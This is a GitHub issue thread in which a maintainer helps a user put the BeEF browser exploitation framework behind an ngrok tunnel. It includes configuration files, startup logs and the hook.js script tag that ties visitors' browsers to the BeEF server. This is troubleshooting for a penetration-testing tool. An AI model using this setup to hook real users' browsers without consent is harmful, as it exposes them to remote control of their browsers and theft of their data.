beef-xss with ngrok is not working :(

[azamet90]

the wiki page is not enough to understand if i put the link and change the port the beef is giving error -1 i tryed every type of link and port to add to the config.yaml but no luck can anyone pls put here the steps so that we can understand it?

if i not change the port:

[bcoles]

@azamet90 If you want assistance, you'll have to put in some effort.

We tried to help you ages ago but you stopped responding.

Please show your configuration and any logs and error messages.

Please describe what steps you have taken to resolve the issue.

Please carefully read the FAQ again.

• https://github.com/beefproject/beef/wiki/FAQ#how-do-i-configure-beef-with-ngrok

[azamet90]

@azamet90 If you want assistance, you'll have to put in some effort.

We tried to help you ages ago but you stopped responding.

Please show your configuration and any logs and error messages.

Please describe what steps you have taken to resolve the issue.

Please carefully read the FAQ again.

* https://github.com/beefproject/beef/wiki/FAQ#how-do-i-configure-beef-with-ngrok

i did it pls check my images i post you thx for replying so fast but still not working

[ghost]

same

[bcoles]

See your configuration here:

Where you have host, that field is the BeEF host, not the ngrok host.

You need to change public, not host, as described on the wiki.

Also, do not include the URL scheme http://.

Also, when testing, do not use HTTPS. That will make testing more difficult and harder to diagnose the issue.

[bcoles]

If you start with a clean configuration file, literally all you have to do is change these two fields:

        public: "<your-id>.ngrok.io"      # public hostname/IP address
        public_port: "80"                 # public port (experimental)

If are changing more than these two fields, you are doing something wrong.

[azamet90]

If you start with a clean configuration file, all you have to do is change these two fields:

        public: "<your-id>.ngrok.io"      # public hostname/IP address
        public_port: "80"                 # public port (experimental)

---

beef:
  version: 0.5.0.0
  debug: false
  client_debug: false
  crypto_default_value_length: 80
  credentials:
    user: beef
    passwd: Deneme123..1..1
  restrictions:
    permitted_hooking_subnet:
    - 0.0.0.0/0
    - "::/0"
    permitted_ui_subnet:
    - 0.0.0.0/0
    - "::/0"
    api_attempt_delay: '0.05'
  http:
    debug: false
    host: 0.0.0.0
    port: '3000'
    xhr_poll_timeout: 1000
    hook_file: "/hook.js"
    hook_session_name: BEEFHOOK
    restful_api:
      allow_cors: false
      cors_allowed_domains: http://browserhacker.com
    websocket:
      enable: false
      port: 61985
      secure: true
      secure_port: 61986
      ws_poll_timeout: 1000
      ws_connect_timeout: 500
    web_server_imitation:
      enable: true
      type: apache
      hook_404: false
      hook_root: false
    https:
      enable: false
      key: beef_key.pem
      cert: beef_cert.pem
  database:
    file: db/beef.db
  autorun:
    result_poll_interval: 300
    result_poll_timeout: 5000
    continue_after_timeout: true
  dns_hostname_lookup: false
  geoip:
    enable: true
    database: "/var/lib/GeoIP/GeoLite2-City.mmdb"
  integration:
    phishing_frenzy:
      enable: false
  extension:
    admin_ui:
      enable: true
      base_path: "/ui"
    demos:
      enable: true
    events:
      enable: true
    evasion:
      enable: false
    requester:
      enable: true
    proxy:
      enable: true
    network:
      enable: true
    metasploit:
      enable: false
    social_engineering:
      enable: true
    xssrays:
      enable: true

i cannot see that option in default config.yaml file? it is preinstalled on kali distro. does it means i need to add some extra line? if so where?

[bcoles]

does it means i need to add some extra line? if so where?

Yes, you do not have the correct fields. See CHANGEME below.

#
# Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file

beef:
    version: '0.5.0.0-alpha-pre'
    # More verbose messages (server-side)
    debug: false
    # More verbose messages (client-side)
    client_debug: false
    # Used for generating secure tokens
    crypto_default_value_length: 80

    # Credentials to authenticate in BeEF.
    # Used by both the RESTful API and the Admin interface
    credentials:
        user:   "beef"
        passwd: "123"

    # Interface / IP restrictions
    restrictions:
        # subnet of IP addresses that can hook to the framework
        permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
        # subnet of IP addresses that can connect to the admin UI
        #permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
        permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
        # slow API calls to 1 every  api_attempt_delay  seconds
        api_attempt_delay: "0.05"

    # HTTP server
    http:
        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
        host: "0.0.0.0"
        port: "3000"

        # Decrease this setting to 1,000 (ms) if you want more responsiveness
        #  when sending modules and retrieving results.
        # NOTE: A poll timeout of less than 5,000 (ms) might impact performance
        #  when hooking lots of browsers (50+).
        # Enabling WebSockets is generally better (beef.websocket.enable)
        xhr_poll_timeout: 1000

        # Host Name / Domain Name
        # If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
        #   set the public hostname below:
        #public: ""      # public hostname/IP address

        # Reverse Proxy / NAT
        # If you want BeEF to be accessible behind a reverse proxy or NAT,
        #   set both the publicly accessible hostname/IP address and port below:
        # NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
        #   by altering the X-FORWARDED-FOR ip address in the request header.
        allow_reverse_proxy: false
        #public: ""      # public hostname/IP address    <--- CHANGEME
        #public_port: "" # public port (experimental)    <--- CHANGEME

        # Hook
        hook_file: "/hook.js"
        hook_session_name: "BEEFHOOK"

        # Allow one or multiple origins to access the RESTful API using CORS
        # For multiple origins use: "http://browserhacker.com, http://domain2.com"
        restful_api:
            allow_cors: false
            cors_allowed_domains: "http://browserhacker.com"

        # Prefer WebSockets over XHR-polling when possible.
        websocket:
            enable: false
            port: 61985 # WS: good success rate through proxies
            # Use encrypted 'WebSocketSecure'
            # NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
            secure: true
            secure_port: 61986 # WSSecure
            ws_poll_timeout: 5000 # poll BeEF every x second, this affects how often the browser can have a command execute on it
            ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel

        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
        web_server_imitation:
            enable: true
            type: "apache" # Supported: apache, iis, nginx
            hook_404: false # inject BeEF hook in HTTP 404 responses
            hook_root: false # inject BeEF hook in the server home page
        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
        https:
            enable: false
            # In production environments, be sure to use a valid certificate signed for the value
            # used in beef.http.public (the domain name of the server where you run BeEF)
            key: "beef_key.pem"
            cert: "beef_cert.pem"

    database:
        file: "beef.db"

    # Autorun Rule Engine
    autorun:
        # this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
        # to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
        # continue execution regardless of results.
        # If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
        result_poll_interval: 300
        result_poll_timeout: 5000

        # If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
        # This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
        continue_after_timeout: true

    # Enables DNS lookups on zombie IP addresses
    dns_hostname_lookup: false

    # IP Geolocation
    # NOTE: requires MaxMind database. Run ./updated-geoipdb to install.
    geoip:
        enable: true
        database: '/opt/GeoIP/GeoLite2-City.mmdb'

    # Integration with PhishingFrenzy
    # If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
    # to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
    integration:
        phishing_frenzy:
            enable: false

    # You may override default extension configuration parameters here
    # Note: additional experimental extensions are available in the 'extensions' directory
    #       and can be enabled via their respective 'config.yaml' file
    extension:
        admin_ui:
            enable: true
            base_path: "/ui"
        demos:
            enable: true
        events:
            enable: true
        evasion:
            enable: false
        requester:
            enable: true
        proxy:
            enable: true
        network:
            enable: true
        metasploit:
            enable: false
        social_engineering:
            enable: true
        xssrays:
            enable: true

[azamet90]

public:

it is very different on me as u can see sir... can i just copy this and put in to my config.yaml file? will it work also without errors if i do it?

[bcoles]

it is very different on me as u can see sir... can i just copy this and put in to my config.yaml file? will it work also without errors if i do it?

There's one way to find out.

[bcoles]

Actually, no, don't copy my entire configuration file.

Just put these two lines under beef -> http :

beef:
    # ... snip ...
    http:
    # ... snip ...
        public: "<your-id>.ngrok.io"      # public hostname/IP address
        public_port: "80"                 # public port (experimental)

[bcoles]

Also, when you pasted your configuration file above, you also pasted your password. You might want to change it.

[azamet90]

Also, when you pasted your configuration file above, you also pasted your password. You might want to change it. :-/ what am i doing still wrong sir?

[bcoles]

:-/ what am i doing still wrong sir?

Try testing with HTTP not HTTPS

Also, try testing with the demo page.

Remember, you are trying to debug your configuration. Debugging is extremely difficult when you change more than one thing at a time.

[azamet90]

:-/ what am i doing still wrong sir?

Try testing with HTTP not HTTPS

Also, try testing with the demo page.

Remember, you are trying to debug your configuration. Debugging is extremely difficult when you change more than one thing at a time.

result is same i cannot see my browser there :-/

[bcoles]

result is same i cannot see my browser there :-/

It seems like you've got ngrok working. Congratulations!

The issue you face is another one.

If you want assistance, you'll have to put in some effort.

Please show your configuration and any logs and error messages.

Please describe what steps you have taken to resolve the issue.

[azamet90]

first i started ngrok with ngrok --start all

Session Status                online                                                            
Account                       xxxxx (Plan: Free)                                               
Version                       2.3.35                                                            
Region                        United States (us)                                                
Web Interface                 http://127.0.0.1:4040                                             
Forwarding                    http://xxxxxx.ngrok.io -> http://localhost:80               
Forwarding                    https://xxxxxx.ngrok.io -> http://localhost:80              
Forwarding                    http://xxxxxxxx.ngrok.io -> http://localhost:3000             
Forwarding                    https://xxxxxx.ngrok.io -> http://localhost:3000            

Connections                   ttl     opn     rt1     rt5     p50     p90                       
                              0       0       0.00    0.00    0.00    0.00  

after i did put the link which is given for port 80 to beef config.yaml

    public: "xxxxxx.ngrok.io"      # public hostname/IP address
    public_port: "80"                 # public port (experimental)

after i started beef-xss

sudo beef-xss
[i] GeoIP database is missing
[i] Run geoipupdate to download / update Maxmind GeoIP database
[*] Please wait for the BeEF service to start.
[*]
[*] You might need to refresh your browser once it opens.
[*]
[*]  Web UI: http://127.0.0.1:3000/ui/panel
[*]    Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>

● beef-xss.service - beef-xss
     Loaded: loaded (/lib/systemd/system/beef-xss.service; disabled; vendor preset: disabled)
     Active: active (running) since Sun 2020-06-14 16:57:01 +03; 5s ago
   Main PID: 22296 (ruby)
      Tasks: 4 (limit: 18967)
     Memory: 73.4M
     CGroup: /system.slice/beef-xss.service
             └─22296 ruby /usr/share/beef-xss/beef

Haz 14 16:57:01 MrRobots systemd[1]: Started beef-xss.
Haz 14 16:57:02 MrRobots beef[22296]: [16:57:02][*] Browser Exploitation Framework (BeEF)….5.0.0
Haz 14 16:57:02 MrRobots beef[22296]: [16:57:02]    |   Twit: @beefproject
Haz 14 16:57:02 MrRobots beef[22296]: [16:57:02]    |   Site: https://beefproject.com
Haz 14 16:57:02 MrRobots beef[22296]: [16:57:02]    |   Blog: http://blog.beefproject.com
Haz 14 16:57:02 MrRobots beef[22296]: [16:57:02]    |_  Wiki: https://github.com/beefproj…f/wiki
Haz 14 16:57:02 MrRobots beef[22296]: [16:57:02][*] Project Creator: Wade Alcorn (@WadeAlcorn)
Haz 14 16:57:02 MrRobots beef[22296]: -- migration_context()
Haz 14 16:57:02 MrRobots beef[22296]:    -> 0.0033s
Haz 14 16:57:02 MrRobots beef[22296]: [16:57:02][*] BeEF is loading. Wait a few seconds...
Hint: Some lines were ellipsized, use -l to show in full.

[*] Opening Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1..

after i put the js code after head like this one:

this is the ngrok link which is for port 3000

after i logged in to browser with the 3000 port ngrok link and after i open the page with beef script but there is no sesson ... where is the logs?

[bcoles]

The Web Starter Kit is not the demo page. Is it hosted on HTTPS?

Use the HTTP demo page: http://your.ngrok.address/demos/basic.html

but there is no sesson ... where is the logs?

There are browser logs in the browser console. On Firefox, press CTRL+SHIFT+K and look at the console for error messages. You may also want to look at the Network tab to view the network traffic.

The server logs are usually stored in ~/.beef/. The logs are also displayed in the terminal when BeEF is stared; however, BeEF runs as the beef-xss service on Kali, you may need to look in journalctl.

[azamet90]

after this log i fixed my problem thank you so much